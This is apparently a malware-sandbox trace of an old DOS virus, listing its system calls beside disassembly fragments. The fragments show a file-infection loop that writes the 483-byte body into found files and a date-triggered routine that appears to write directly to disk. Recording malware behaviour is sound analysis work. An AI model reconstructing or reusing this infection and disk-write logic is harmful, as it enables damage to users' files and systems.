Sample viewer

vx.netlux.org/Virus.DOS.VCC.Gr.483

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:44.458805152Z 26 PC: 12baa | Set disk transfer address
2018-12-17T23:11:44.460659275Z 53 PC: 12bb0 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:11:44.462417455Z 53 PC: 12bbd | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T23:11:44.464214048Z 44 PC: 12bc8 | Get time 0x12bc8: cmp dl, 0xd
0x12bcb: jg 0x12bd1
0x12bcd: mov al, 0x82
0x12bcf: out 0x21, al
0x12bd1: mov ah, 0x2c
0x12bd3: int 0x21
0x12bd5: cmp dl, 0x32
0x12bd8: jg 0x12c59
0x12bda: mov si, 0
0x12bdd: xor byte ptr [bp + si + 0x16c], 0x41
0x12be2: cmp si, 0x11
0x12be5: je 0x12bea
0x12be7: inc si
0x12be8: jmp 0x12bdd
0x12bea: mov ah, 9
0x12bec: lea dx, word ptr [bp + 0x16c]
0x12bf0: int 0x21
0x12bf2: mov ah, 0
0x12bf4: int 0x16
0x12bf6: jmp 0x12c59
2018-12-17T23:11:44.477057981Z 44 PC: 12bd5 | Get time 0x12bd5: cmp dl, 0x32
0x12bd8: jg 0x12c59
0x12bda: mov si, 0
0x12bdd: xor byte ptr [bp + si + 0x16c], 0x41
0x12be2: cmp si, 0x11
0x12be5: je 0x12bea
0x12be7: inc si
0x12be8: jmp 0x12bdd
0x12bea: mov ah, 9
0x12bec: lea dx, word ptr [bp + 0x16c]
0x12bf0: int 0x21
0x12bf2: mov ah, 0
0x12bf4: int 0x16
0x12bf6: jmp 0x12c59
0x12bf8: nop
0x12bf9: popaw
0x12bfa: add si, word ptr [si]
0x12bfc: xor bp, word ptr [bx]
0x12bfe: add bh, byte ptr [bx + si]
0x12c00: and ch, byte ptr [di]
2018-12-17T23:11:44.492669274Z 78 PC: 12c72 | Find first file
2018-12-17T23:11:44.499085766Z 61 PC: 12c82 | Open file (Filename = '')
2018-12-17T23:11:44.506925416Z 63 PC: 12c90 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:44.525969583Z 66 PC: 12c9f | Move file pointer
2018-12-17T23:11:44.527577034Z 64 PC: 12cb1 | Write file or device (Write 483 bytes on handle 5)
2018-12-17T23:11:44.540566699Z 66 PC: 12cb9 | Move file pointer
2018-12-17T23:11:44.543014692Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:44.547621607Z 62 PC: 12ccd | Close file
2018-12-17T23:11:44.55361Z 79 PC: 12c72 | Find next file
2018-12-17T23:11:44.556176628Z 61 PC: 12c82 | Open file (Filename = '')
2018-12-17T23:11:44.561484017Z 63 PC: 12c90 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:44.566210551Z 66 PC: 12c9f | Move file pointer
2018-12-17T23:11:44.568129303Z 64 PC: 12cb1 | Write file or device (Write 483 bytes on handle 5)
2018-12-17T23:11:44.574551379Z 66 PC: 12cb9 | Move file pointer
2018-12-17T23:11:44.575972013Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:44.584862688Z 62 PC: 12ccd | Close file
2018-12-17T23:11:44.595876385Z 79 PC: 12c72 | Find next file
2018-12-17T23:11:44.599702005Z 61 PC: 12c82 | Open file (Filename = '')
2018-12-17T23:11:44.609761861Z 63 PC: 12c90 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:44.617067141Z 66 PC: 12c9f | Move file pointer
2018-12-17T23:11:44.618792013Z 64 PC: 12cb1 | Write file or device (Write 483 bytes on handle 5)
2018-12-17T23:11:44.622224675Z 66 PC: 12cb9 | Move file pointer
2018-12-17T23:11:44.624363261Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:44.627515793Z 62 PC: 12ccd | Close file
2018-12-17T23:11:44.640163337Z 79 PC: 12c72 | Find next file
2018-12-17T23:11:44.642433803Z 61 PC: 12c82 | Open file (Filename = '')
2018-12-17T23:11:44.648056303Z 63 PC: 12c90 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:44.655507488Z 66 PC: 12c9f | Move file pointer
2018-12-17T23:11:44.658206917Z 64 PC: 12cb1 | Write file or device (Write 483 bytes on handle 5)
2018-12-17T23:11:44.666454259Z 66 PC: 12cb9 | Move file pointer
2018-12-17T23:11:44.668127112Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:44.67363348Z 62 PC: 12ccd | Close file
2018-12-17T23:11:44.679881498Z 79 PC: 12c72 | Find next file
2018-12-17T23:11:44.681938311Z 61 PC: 12c82 | Open file (Filename = '')
2018-12-17T23:11:44.687843555Z 63 PC: 12c90 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:44.692428342Z 66 PC: 12c9f | Move file pointer
2018-12-17T23:11:44.694136817Z 64 PC: 12cb1 | Write file or device (Write 483 bytes on handle 5)
2018-12-17T23:11:44.697725748Z 66 PC: 12cb9 | Move file pointer
2018-12-17T23:11:44.699604873Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:44.702757182Z 62 PC: 12ccd | Close file
2018-12-17T23:11:44.712517404Z 42 PC: 12ce2 | Get date 0x12ce2: cmp dh, 0x11
0x12ce5: jl 0x12d06
0x12ce7: cmp dl, 8
0x12cea: jl 0x12d06
0x12cec: mov ah, 0x19
0x12cee: int 0x21
0x12cf0: mov cx, 0x25
0x12cf3: mov dx, 0
0x12cf6: lea bx, word ptr [bp + 0x16c]
0x12cfa: push ds
0x12cfb: pop es
0x12cfc: mov byte ptr [bp + 0x275], 0x26
0x12d01: int 0x19
0x12d03: add sp, 2
0x12d06: mov ah, 0x1a
0x12d08: mov dx, 0x80
0x12d0b: int 0x21
0x12d0d: call 0x12d10
0x12d10: call 0x12d13
0x12d13: call 0x12d16
2018-12-17T23:11:44.715076924Z 26 PC: 12d0d | Set disk transfer address
2018-12-17T23:11:44.716532244Z 9 PC: 12d2d | Display string (String= ' �pZp�5p��CON Gp��!AUX Yp���PRN kp��9CLOCK')
2018-12-17T23:11:44.727315494Z 9 PC: 12a82 | Display string (Could not find end pointer)
2018-12-17T23:11:44.733002937Z 76 PC: 12a86 | Terminate with return code (Return code = '36')